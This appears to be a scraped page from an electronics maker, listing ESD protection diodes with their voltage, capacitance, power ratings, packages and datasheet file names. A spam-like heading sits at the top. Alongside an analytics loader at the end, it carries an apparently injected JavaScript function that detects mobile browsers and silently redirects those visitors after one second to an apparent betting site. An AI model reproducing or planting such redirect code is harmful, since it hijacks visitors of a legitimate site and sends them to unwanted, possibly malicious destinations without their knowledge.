5197注册

  • EN

ESD Protection

Part Number Reverse Stand-off Voltage Reverse Breakdown Voltage Reverse Leakage Current Clamping Voltage Max. Clamping Voltage Peak Pulse Current Off-State Capacitance Peak Pulse Power (8/20uS) ESD Air(kV) ESD Contact(kV) Direction Package download
VRWM(V) VBR(min)(V) IR(uA) VC(V) @ 1A VC(V) @ Ipp Ipp(A) CJ(pF) Ppp(W)
YSBLC08C 8 8.5 2 13.4 18.5 8 1.0 / 0.4 350 15 8 Array SOD-323 YSBLCxxC_REV.07_20200505.pdf
YSBLC12 12 13.3 1 19 28.6 6 0.4 350 15 8 Array SOD-323 YSBLCxx_REV.06_20200505.pdf
YSBLC12C 12 13.3 1 19 28.6 6 1.0 / 0.4 350 15 8 Array SOD-323 YSBLCxxC_REV.07_20200505.pdf
YSBLC15C 15 16.7 1 24 31.8 5 1.0 / 0.4 350 15 8 Array SOD-323 YSBLCxxC_REV.07_20200505.pdf
YSBLC24C 24 26.7 1 43 56 3 1.0 / 0.4 350 15 8 Array SOD-323 YSBLCxxC_REV.07_20200505.pdf
YSCLAMP0504F 5 6 1 9.8 20 3 1.2 100 15 8 Array SOT-363 YSCLAMP0504F_REV.05_20200505.pdf
YSCLAMP0524P 5.5 6 0.5 9.8 15 3 0.6 / 0.25 45 20 20 Array DFN2510 / SLP2510P8 YSCLAMP0524P_REV.05_20200505.pdf
YSCLAMP2401P 24 26.7 1 45 - - 45 200 25 25 Uni DFN1006 YSCLAMP2401P_REV.02_20200505.pdf
YSCLAMP3321PSCR 3.3 4 0.1 8.9 12 4 0.35 45 20 20 Bi DFN0603 YSCLAMP3321PSCR_REV.02_20200505.pdf
YSCLAMP3611P 36 40 1 65 110 2.5 25 200 15 8 Bi DFN1006 YSCLAMP3611P_REV.02_20200505.pdf
YSDA0502C 5 6 5 9.8 17 6 30 100 15 8 Array SOT-23 YSDA0502C_REV.05_20200505.pdf
YSDT-12V 12 13 2 25 - - 12(typ.) 25 25 25 Array SOT-23 YSDT-12V_REV.05_20200505.pdf
YSESD0301CP 3.3 4.2 0.1 12 21 4 0.4 84 20 20 Bi DFN1006 YSESD0301CP_REV.02_20200505.pdf
YSESD03CD52CT 3.3 3.8 0.1 5 10 30 70 300 15 8 Bi SOD-523FL YSESD03CD52CT_REV.03_20200505.pdf
YSESD0501CP 5 6 0.1 13 22 4 0.4 88 20 20 Bi DFN1006 YSESD0501CP_REV.02_20200506.pdf
YSESD0502T5L 5 6 0.1 10 - - 0.6 60 20 20 Array SOT-523 YSESD0502T5L_REV.01 20201224.pdf
YSESD0502TL 5 6 0.1 10 - - 0.4(typ.) 60 20 20 Array SOT-23 YSESD0502TL_REV.01_20201130.pdf
YSESD0504TL 5 6 1 10 15 4 0.45(typ.) 60 25 20 Array SOT-26 YSESD0504TL_REV.01 20210630.pdf
YSESD05CN92BL 5 6 0.1 - 12 2 3 50 15 8 Array DFN1006-3L YSESD05CN92BL_REV.02_20200505.pdf
YSESD05D6BU 5 6 0.1 13 25 4 0.25(typ.) 100 20 20 Bi DFN0603 YSESD05D6BU_REV.02_20200505.pdf
var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();